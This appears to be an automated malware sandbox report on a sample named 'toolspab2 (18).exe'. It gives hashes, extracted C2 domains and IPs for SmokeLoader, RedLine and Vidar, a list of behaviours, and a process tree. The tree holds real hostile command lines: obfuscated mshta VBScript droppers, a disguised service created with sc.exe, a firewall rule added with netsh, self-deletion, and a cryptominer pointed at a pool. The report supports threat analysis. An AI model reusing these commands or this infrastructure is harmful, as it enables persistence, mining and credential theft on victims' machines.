Resubmissions

12-07-2021 16:55

210712-cvz622xsbj 10

10-07-2021 13:25

210710-pdfh7kft96 10

09-07-2021 23:00

210709-hewxkm1xlj 10

09-07-2021 16:08

210709-5ql27kyjqa 10

09-07-2021 14:08

210709-pt977a4bhe 10

08-07-2021 22:09

210708-3ypfnj5j7x 10

08-07-2021 13:30

210708-4hsk7y9f2x 10

08-07-2021 12:14

210708-8t5f9z9egj 10

Analysis

  • max time kernel
    1800s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    09-07-2021 23:00

General

  • Target

    toolspab2 (18).exe

  • Size

    315KB

  • MD5

    1d20e1f65938e837ef1b88f10f1bd6c3

  • SHA1

    703d7098dbfc476d2181b7fc041cc23e49c368f1

  • SHA256

    05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d

  • SHA512

    f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
1
0x0a8e21be
rc4.i32
1
0x8fc93161
rc4.i32
1
0xcc4f5fd4
rc4.i32
1
0x2a68f03e

Extracted

Family

redline

Botnet

1

C2

45.32.235.238:45555

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

redline

C2

82.202.161.37:26317

Extracted

Family

redline

Botnet

BtcOnly

C2

185.53.46.82:3214

Extracted

Family

vidar

Version

39.4

Botnet

824

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    824

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Vidar Stealer 2 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 45 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 30 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:68
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
        PID:596
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1840
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            PID:2344
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4040
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:1740
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:1236
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:4220
        • C:\Users\Admin\AppData\Roaming\tjrsafr
          C:\Users\Admin\AppData\Roaming\tjrsafr
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:5868
          • C:\Users\Admin\AppData\Roaming\tjrsafr
            C:\Users\Admin\AppData\Roaming\tjrsafr
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            PID:5336
        • C:\Users\Admin\AppData\Roaming\awrsafr
          C:\Users\Admin\AppData\Roaming\awrsafr
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks SCSI registry key(s)
          PID:6140
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
        1⤵
          PID:1076
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Themes
          1⤵
            PID:1212
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
            1⤵
              PID:1204
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1852
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                  1⤵
                    PID:2424
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                    1⤵
                      PID:2476
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                      1⤵
                        PID:2708
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                        1⤵
                          PID:2696
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                          1⤵
                          • Suspicious use of SetThreadContext
                          PID:2788
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                            2⤵
                            • Drops file in System32 directory
                            • Checks processor information in registry
                            • Modifies data under HKEY_USERS
                            • Modifies registry class
                            PID:6100
                        • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                          "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                          1⤵
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:628
                          • C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe
                            "C:\Users\Admin\AppData\Local\Temp\toolspab2 (18).exe"
                            2⤵
                            • Loads dropped DLL
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:2864
                        • C:\Users\Admin\AppData\Local\Temp\7129.exe
                          C:\Users\Admin\AppData\Local\Temp\7129.exe
                          1⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of WriteProcessMemory
                          PID:1976
                          • C:\Users\Admin\AppData\Local\Temp\7129.exe
                            C:\Users\Admin\AppData\Local\Temp\7129.exe
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3052
                        • C:\Users\Admin\AppData\Local\Temp\759F.exe
                          C:\Users\Admin\AppData\Local\Temp\759F.exe
                          1⤵
                          • Executes dropped EXE
                          PID:636
                        • C:\Users\Admin\AppData\Local\Temp\790B.exe
                          C:\Users\Admin\AppData\Local\Temp\790B.exe
                          1⤵
                          • Executes dropped EXE
                          PID:3068
                        • C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          C:\Users\Admin\AppData\Local\Temp\7F36.exe
                          1⤵
                          • Executes dropped EXE
                          PID:4040
                        • C:\Users\Admin\AppData\Local\Temp\8523.exe
                          C:\Users\Admin\AppData\Local\Temp\8523.exe
                          1⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:3796
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4012
                          • C:\Windows\explorer.exe
                            C:\Windows\explorer.exe
                            1⤵
                              PID:1888
                            • C:\Windows\SysWOW64\explorer.exe
                              C:\Windows\SysWOW64\explorer.exe
                              1⤵
                                PID:1560
                              • C:\Windows\explorer.exe
                                C:\Windows\explorer.exe
                                1⤵
                                • Suspicious behavior: MapViewOfSection
                                PID:2980
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:768
                                • C:\Windows\explorer.exe
                                  C:\Windows\explorer.exe
                                  1⤵
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2796
                                • C:\Windows\SysWOW64\explorer.exe
                                  C:\Windows\SysWOW64\explorer.exe
                                  1⤵
                                    PID:396
                                  • C:\Windows\explorer.exe
                                    C:\Windows\explorer.exe
                                    1⤵
                                    • Suspicious behavior: MapViewOfSection
                                    PID:1176
                                  • C:\Windows\SysWOW64\explorer.exe
                                    C:\Windows\SysWOW64\explorer.exe
                                    1⤵
                                      PID:3008
                                    • C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      C:\Users\Admin\AppData\Local\Temp\E351.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:3136
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 480
                                        2⤵
                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                        • Program crash
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3620
                                    • C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      C:\Users\Admin\AppData\Local\Temp\FD49.exe
                                      1⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2080
                                    • C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      C:\Users\Admin\AppData\Local\Temp\FEF0.exe
                                      1⤵
                                      • Executes dropped EXE
                                      PID:568
                                      • C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp
                                        "C:\Users\Admin\AppData\Local\Temp\is-CF6SK.tmp\FEF0.tmp" /SL5="$70038,506127,422400,C:\Users\Admin\AppData\Local\Temp\FEF0.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3796
                                        • C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe
                                          "C:\Users\Admin\AppData\Local\Temp\is-TJ091.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec7
                                          3⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • Drops file in Program Files directory
                                          PID:3800
                                          • C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe
                                            "C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1324
                                            • C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-FGA0V.tmp\irecord.tmp" /SL5="$10228,5808768,66560,C:\Program Files\Windows Sidebar\IKCLRUSQCW\irecord.exe" /VERYSILENT
                                              5⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              • Suspicious use of FindShellTrayWindow
                                              PID:4120
                                              • C:\Program Files (x86)\i-record\I-Record.exe
                                                "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                6⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                PID:4488
                                          • C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe
                                            "C:\Users\Admin\AppData\Local\Temp\67-dec28-50a-ac786-c1a3ea8bcfa43\Fivemyboha.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:4032
                                          • C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe
                                            "C:\Users\Admin\AppData\Local\Temp\de-d7b13-e10-607aa-23b713b607311\Dywolaboshe.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4300
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubwmeyfn.iis\GcleanerEU.exe /eufive & exit
                                              5⤵
                                                PID:920
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oun3zgq3.1be\installer.exe /qn CAMPAIGN="654" & exit
                                                5⤵
                                                  PID:3988
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe & exit
                                                  5⤵
                                                    PID:5328
                                                    • C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      C:\Users\Admin\AppData\Local\Temp\cwg2ok1i.hld\ufgaa.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5640
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5964
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:5564
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:716
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        7⤵
                                                        • Executes dropped EXE
                                                        PID:1640
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe & exit
                                                    5⤵
                                                      PID:5976
                                                      • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:6136
                                                        • C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\vyoefepe.0e0\google-game.exe" -a
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:1092
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52oojsez.zd4\GcleanerWW.exe /mixone & exit
                                                      5⤵
                                                        PID:4972
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe & exit
                                                        5⤵
                                                          PID:1764
                                                          • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4188
                                                            • C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              C:\Users\Admin\AppData\Local\Temp\f4htnqqu.njt\toolspab1.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:5692
                                                • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  C:\Users\Admin\AppData\Local\Temp\913.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:2208
                                                  • C:\Users\Admin\AppData\Local\Temp\913.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\913.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:1400
                                                • C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CDC.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  PID:3984
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\btekfjwo\
                                                    2⤵
                                                      PID:1336
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cfxzukov.exe" C:\Windows\SysWOW64\btekfjwo\
                                                      2⤵
                                                        PID:2064
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" create btekfjwo binPath= "C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe /d\"C:\Users\Admin\AppData\Local\Temp\CDC.exe\"" type= own start= auto DisplayName= "wifi support"
                                                        2⤵
                                                          PID:3456
                                                        • C:\Windows\SysWOW64\sc.exe
                                                          "C:\Windows\System32\sc.exe" description btekfjwo "wifi internet conection"
                                                          2⤵
                                                            PID:3768
                                                          • C:\Windows\SysWOW64\sc.exe
                                                            "C:\Windows\System32\sc.exe" start btekfjwo
                                                            2⤵
                                                              PID:2988
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                              2⤵
                                                                PID:1320
                                                            • C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              C:\Users\Admin\AppData\Local\Temp\15D6.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Modifies system certificate store
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:996
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c taskkill /f /im chrome.exe
                                                                2⤵
                                                                  PID:2144
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /f /im chrome.exe
                                                                    3⤵
                                                                    • Kills process with taskkill
                                                                    PID:4236
                                                              • C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                C:\Users\Admin\AppData\Local\Temp\1D88.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4040
                                                              • C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                C:\Users\Admin\AppData\Local\Temp\23C3.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:3052
                                                              • C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                C:\Users\Admin\AppData\Local\Temp\26F0.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:1804
                                                              • C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2D98.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:4072
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\2D98.exe"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                  2⤵
                                                                    PID:2028
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\2D98.exe" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\2D98.exe") do taskkill -f /Im "%~nxs"
                                                                      3⤵
                                                                        PID:4128
                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                          taskkill -f /Im "2D98.exe"
                                                                          4⤵
                                                                          • Kills process with taskkill
                                                                          PID:4760
                                                                        • C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE
                                                                          ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:4628
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbsCript: clOSE ( CrEAteOBJect ("WscRIPt.ShELL" ). rUN ( "CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " , 0 , truE ) )
                                                                            5⤵
                                                                              PID:5060
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"
                                                                                6⤵
                                                                                  PID:3716
                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                "C:\Windows\System32\mshta.exe" VBSCrIpT: cLose ( CreAteObject( "wSCrIPt.ShelL" ). RUN ( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0 , tRuE ) )
                                                                                5⤵
                                                                                  PID:4644
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i &copy /Y /b 0CZKPBA.~i +HzMuGQn.ebg + 3KLPjZ48.1 + JBBP.aZ +jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S& dEl /Q *
                                                                                    6⤵
                                                                                      PID:1872
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" ECHO "
                                                                                        7⤵
                                                                                          PID:3888
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"
                                                                                          7⤵
                                                                                            PID:4876
                                                                                          • C:\Windows\SysWOW64\regsvr32.exe
                                                                                            regsvr32.exe ..\LphZr4.XZ /U -S
                                                                                            7⤵
                                                                                            • Loads dropped DLL
                                                                                            • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                            PID:5236
                                                                              • C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\31DF.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Checks processor information in registry
                                                                                PID:816
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 31DF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\31DF.exe" & del C:\ProgramData\*.dll & exit
                                                                                  2⤵
                                                                                    PID:5532
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /im 31DF.exe /f
                                                                                      3⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5736
                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                      timeout /t 6
                                                                                      3⤵
                                                                                      • Delays execution with timeout.exe
                                                                                      PID:5436
                                                                                • C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe
                                                                                  C:\Windows\SysWOW64\btekfjwo\cfxzukov.exe /d"C:\Users\Admin\AppData\Local\Temp\CDC.exe"
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:3116
                                                                                  • C:\Windows\SysWOW64\svchost.exe
                                                                                    svchost.exe
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Suspicious use of SetThreadContext
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:4604
                                                                                    • C:\Windows\SysWOW64\svchost.exe
                                                                                      svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                                                                      3⤵
                                                                                        PID:5248
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
